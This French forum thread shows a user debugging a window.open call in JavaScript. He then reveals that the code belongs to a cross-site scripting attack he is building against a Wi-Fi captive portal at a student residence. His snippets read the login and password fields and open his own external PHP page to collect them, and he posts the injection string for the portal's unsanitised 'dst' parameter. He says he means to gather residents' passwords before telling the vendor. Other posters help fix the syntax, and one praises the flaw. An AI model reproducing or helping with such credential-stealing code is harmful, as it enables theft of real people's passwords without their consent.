Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
1599 connectés 

  FORUM HardWare.fr
  Programmation
  HTML/CSS

  window.open avec des variables JS en GET

 


 Mot :   Pseudo :  
 
Bas de page
Auteur Sujet :

window.open avec des variables JS en GET

n°1543558
pmusa
▓▓▓▓▓▓▓
Posté le 17-04-2007 à 00:21:26  profilanswer
 

yo  :o  
 
y'a une couille.  :fou:  
 
j'ouvre une popup JS via un lien avec l'attribut onclick. donc j'utilise un code qui ressemble à ça:
 
<a href="" onclick="window.open('http://monsite.free.fr/dir/file.php');">prout</a>
 
 
si je mets ceci:

Code :
  1. window.open('http://monsite.free.fr/dir/file.php');


 
impeccable, la popup s'ouvre au onclick. :)
 
si je mets ceci:

Code :
  1. window.open('http://monsite.free.fr/dir/file.php?p=' +var1+ '~' + var2);


(~ est un séparateur à la con, c'est pour éviter de placer un & qui transmettrais 2 variables bien distinctes, ce que je ne veux pas pour des raisons perso ;) )
 
de telle sorte que ça me pop la page suivante:
http://monsite.free.fr/dir/file.php?p=valeur1~valeur2
 
ça n'ouvre plus le popup. var1 et var2 sont parfaitement déclarées et retournent bien les valeurs (j'ai testé avec un alert(); pour voir), donc le problème vient de la syntaxe qui est très certainement incorrecte.
Je sais qu'il est tout à fait possible de passer des vars comme ça en GET via du JS, mais je me souviens plus. :'(
 
Avec mes remerciements,  :hello:


---------------
intralase surgery [:cerveau love]
mood
Publicité
Posté le 17-04-2007 à 00:21:26  profilanswer
 

n°1543602
flo850
moi je
Posté le 17-04-2007 à 09:14:31  profilanswer
 

peut etre que c'est parceque ~ n'est pas transmissible directement dnas une url
essaye ca :  
window.open('http://monsite.free.fr/dir/file.php?p=' +escape(var1+ '~' + var2));

n°1543742
pmusa
&#9619;&#9619;&#9619;&#9619;&#9619;&#9619;&#9619;
Posté le 17-04-2007 à 12:48:10  profilanswer
 

non plus.
voilà plus précisément le bout de code qui fonctionne parfaitement:

Code :
  1. <a href="" onclick="javascript:login=logout.login.value; pwd=logout.passwd.value; window.open('http://moi.free.fr/ucopia_xss/kaydetvegonder.php?l=');">test</a>


 
avec ta technique et la mienne ça ne fonctionne pas, et je doute que ça vient de l'opérateur ~, j'ai aussi essayé avec d'autres, même des lettres, dans le doute...
 
:'(
 
pour info, ce code alerte très bien la valeur de la variable login par exemple:

Code :
  1. <a href="" onclick="javascript:login=logout.login.value; pwd=logout.passwd.value; alert(login);">test</a>


 
:/


---------------
intralase surgery [:cerveau love]
n°1543744
pmusa
&#9619;&#9619;&#9619;&#9619;&#9619;&#9619;&#9619;
Posté le 17-04-2007 à 12:51:39  profilanswer
 

c'est à coup sûr une merdouille avec les guillemets mais j'ai essayé pas mal de combinaisons. :/


---------------
intralase surgery [:cerveau love]
n°1543979
pmusa
&#9619;&#9619;&#9619;&#9619;&#9619;&#9619;&#9619;
Posté le 17-04-2007 à 18:25:49  profilanswer
 

:'(

n°1543982
flo850
moi je
Posté le 17-04-2007 à 18:30:13  profilanswer
 

je peux quand meme demander pourquoi tu ne veux pas passer deux variables ?

n°1544044
pmusa
&#9619;&#9619;&#9619;&#9619;&#9619;&#9619;&#9619;
Posté le 17-04-2007 à 21:33:19  profilanswer
 

j'ai découvert une grossière faille xss sur le portail captif wifi d'une très très grosse boîte qui distribue ses infrastructures un peu partout en France et dans le monde, notamment à celui de ma résidence universitaire (du CROUS)  :D  
Le bout de code JS je le passe dans l'URL, donc je ne peux pas utiliser le & vu qu'il delimite 2 variables GET donc il est "mal traîté" (en fait correctement, mais ça ne permet pas d'exploiter la faille http://forum-images.hardware.fr/icones/message/icon13.gif). donc il suffit d'utiliser un séparateur à la con pour pouvoir faire un explode() en sortie sur le fichier php qui récupèrera distinctement les 2 variables.  :jap:  
 
Pas de panique, je leur enverrai un email quand je pourrais démontrer la faille avec le log qui contiendra les pass des résidents.  ;)
 
pour être plus précis:
 
le log in abouti à une page qui se rafraichit automatiquement pour pouvoir accéder au net(wifi). si on quitte le browser, la session est donc tuée, et ça logout automatiquement. l'url est la suivante:
https://pwetpwet.société.prout/secu [...] ogle.fr%2F
comme on peut le voir, on passe une variable dst en GET. sa valeur est reprise dans le fichier sans aucun traitement, sous la forme suivante:
<a href="http://www.google.fr/">cliquez ici ça ouvre en _blank etc blabla</a>
 
donc il suffit d'écrire après dst= le code JS qui va bien pour détourner le <a href>, par exemple:
blablabla.php?dst=" onclick="javascript:kaka;">pwned!</a><font color="white">
 
 
voilà tu sais tout.  :pt1cable:  
 

n°1544074
flo850
moi je
Posté le 18-04-2007 à 00:15:55  profilanswer
 

tu as essayer de passer &amp; en paramètre ?  
ou un urlencode de & ( me souviens plu du code )

n°1544154
pmusa
&#9619;&#9619;&#9619;&#9619;&#9619;&#9619;&#9619;
Posté le 18-04-2007 à 11:05:58  profilanswer
 

tu vois bien que &amp; comporte déjà une esperluette.  :lol:  
encore une fois, celà ne vient pas du séparateur employé.
 
up.  :o


---------------
intralase surgery [:cerveau love]
n°1544158
zecrazytux
Posté le 18-04-2007 à 11:10:13  profilanswer
 

je ne vois pas l'erreur, mais sympa la faille :D


---------------
Blog photo/récits activités en montagne http://planetcaravan.net
mood
Publicité
Posté le 18-04-2007 à 11:10:13  profilanswer
 

n°1544430
pmusa
&#9619;&#9619;&#9619;&#9619;&#9619;&#9619;&#9619;
Posté le 18-04-2007 à 16:03:40  profilanswer
 

up


---------------
intralase surgery [:cerveau love]
n°1544705
pmusa
&#9619;&#9619;&#9619;&#9619;&#9619;&#9619;&#9619;
Posté le 19-04-2007 à 08:12:26  profilanswer
 

:bounce:

n°1545162
pmusa
&#9619;&#9619;&#9619;&#9619;&#9619;&#9619;&#9619;
Posté le 19-04-2007 à 14:52:21  profilanswer
 

:bounce:

n°1545309
pmusa
&#9619;&#9619;&#9619;&#9619;&#9619;&#9619;&#9619;
Posté le 19-04-2007 à 17:00:27  profilanswer
 

:??:

n°1545477
pmusa
&#9619;&#9619;&#9619;&#9619;&#9619;&#9619;&#9619;
Posté le 20-04-2007 à 02:01:24  profilanswer
 

th1s 1 sp4rtA4A4AAAAaaAAA!!!  :fou:  
 
 :??:

n°1545480
Shinuza
This is unexecpected
Posté le 20-04-2007 à 02:29:04  profilanswer
 

Tu récupères ou ton var1 et var2?
Parce que  
 

Code :
  1. <script type="text/javascript">
  2.  var var1 = "sexe";
  3.  var var2 = "withyoursista";
  4. </script>
  5. <a href="" onclick="window.open('http://monsite.free.fr/dir/file.php?p=' +var1+ '~' + var2);">prout</a>


 
Fonctionne très bien


---------------
Mains power can kill, and it will hurt the entire time you’re dying from it.
n°1545486
gatsu35
Blablaté par Harko
Posté le 20-04-2007 à 08:14:25  profilanswer
 

sinon tu peux aussi utiliser des separateurs du genre : $$$---$$$
là au moins tu es sur de ne pas avoir de pb  
car le tildé ~ pourrait tres bien etre contenu dans tes valeurs
et accessoirement tu fais ca :  
http://monsite.free.fr/dir/file.php?p=' +var1+ '&p=' + var2)
donc ton url sera de la forme : http://monsite.free.fr/dir/file.php?p=toto&p=truc
 
et en PHP quand tu as plusieurs parametres avec le meme nom tu as un array qui est construit, et donc du coup tu as moins de travail à faire

n°1546019
pmusa
&#9619;&#9619;&#9619;&#9619;&#9619;&#9619;&#9619;
Posté le 20-04-2007 à 20:45:33  profilanswer
 

Shinuza a écrit :


"sexe"
"withyoursista"


 :o  
 
 
 
 
anéfé.  :heink: J'y retourne dimanche, je regarderai ça de plus près.  :jap:  
 
sinon, un truc bizarre que j'avais oublié de préciser:
quand je remplace le window.open par un alert() pour voir si les des valeurs sont bien affectées au vars, par exemple via le code suivant:
 
<a href="" onclick="blablabla; alert(var1);">kaka</a>
 
et que je survole le lien, dans la barre d'état (barre de statut? status bar?) en bas, je lis le lien avec alert(var1) dedans (mais qui marche très bien quand je clique dessus), alors que je devrais lire dans la status bar la valeur sans même avoir déjà cliqué dessus, c-à-d alert('valeur1'), non?
bon je suis pas très clair mais je serais davantage précis dimanche/lundi avec qqs screenshots.  :jap:


---------------
intralase surgery [:cerveau love]
n°1546065
Shinuza
This is unexecpected
Posté le 20-04-2007 à 23:21:31  profilanswer
 

Ce sont mes mots de tests, y'a un problème? :o


Message édité par Shinuza le 20-04-2007 à 23:21:42

---------------
Mains power can kill, and it will hurt the entire time you’re dying from it.
n°1546071
pmusa
&#9619;&#9619;&#9619;&#9619;&#9619;&#9619;&#9619;
Posté le 20-04-2007 à 23:44:05  profilanswer
 

:kaola:


---------------
intralase surgery [:cerveau love]
n°1547628
pmusa
&#9619;&#9619;&#9619;&#9619;&#9619;&#9619;&#9619;
Posté le 23-04-2007 à 20:51:52  profilanswer
 

prout


---------------
intralase surgery [:cerveau love]
n°1547657
gatsu35
Blablaté par Harko
Posté le 23-04-2007 à 21:15:04  profilanswer
 
n°1550452
pmusa
&#9619;&#9619;&#9619;&#9619;&#9619;&#9619;&#9619;
Posté le 27-04-2007 à 11:25:17  profilanswer
 

wtf lol [:dawa]


---------------
intralase surgery [:cerveau love]
n°1550485
MagicBuzz
Posté le 27-04-2007 à 12:15:37  profilanswer
 

soit ça me va pas de me coucher à 4h du mat', soit c'est vous qui devriez vous coucher plus tard :o
 
rien panné au lien de gatsu :o
 
mais surtout, rien panné en ce qui concerne un éventuel trou de sécu :??:
 
t'as que du code client là, donc ça veut dire que c'est tip top, t'arrive à tripotter du JS à toi, mais... pour en faire quoi ? c'est pas avec ça que tu va récupérer le login des autres (au mieux, tu vas récupérer ton propre login...)

n°1550705
pmusa
&#9619;&#9619;&#9619;&#9619;&#9619;&#9619;&#9619;
Posté le 27-04-2007 à 16:15:06  profilanswer
 

t'inquiète.  ;)


---------------
intralase surgery [:cerveau love]
mood
Publicité
Posté le   profilanswer
 


Aller à :
Ajouter une réponse
  FORUM HardWare.fr
  Programmation
  HTML/CSS

  window.open avec des variables JS en GET

 

Sujets relatifs
PHP5 : Héritage et variables statiques ?Récupérer des variables de mySql pour flash
[Javascript] window.open et onglet FF/IE[résolu] Variables dynamiques dans des classes
[javascript][résolu] charger une nouvelle page avec window.onloadfatal error RC1015: cannot open include file 'afxres.h'
[PHP] Transfert de variablesAfficher variables chiffres avec 0B800h?
Problème avec un fichier externe pour mes variables 
Plus de sujets relatifs à : window.open avec des variables JS en GET


Copyright © 1997-2022 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR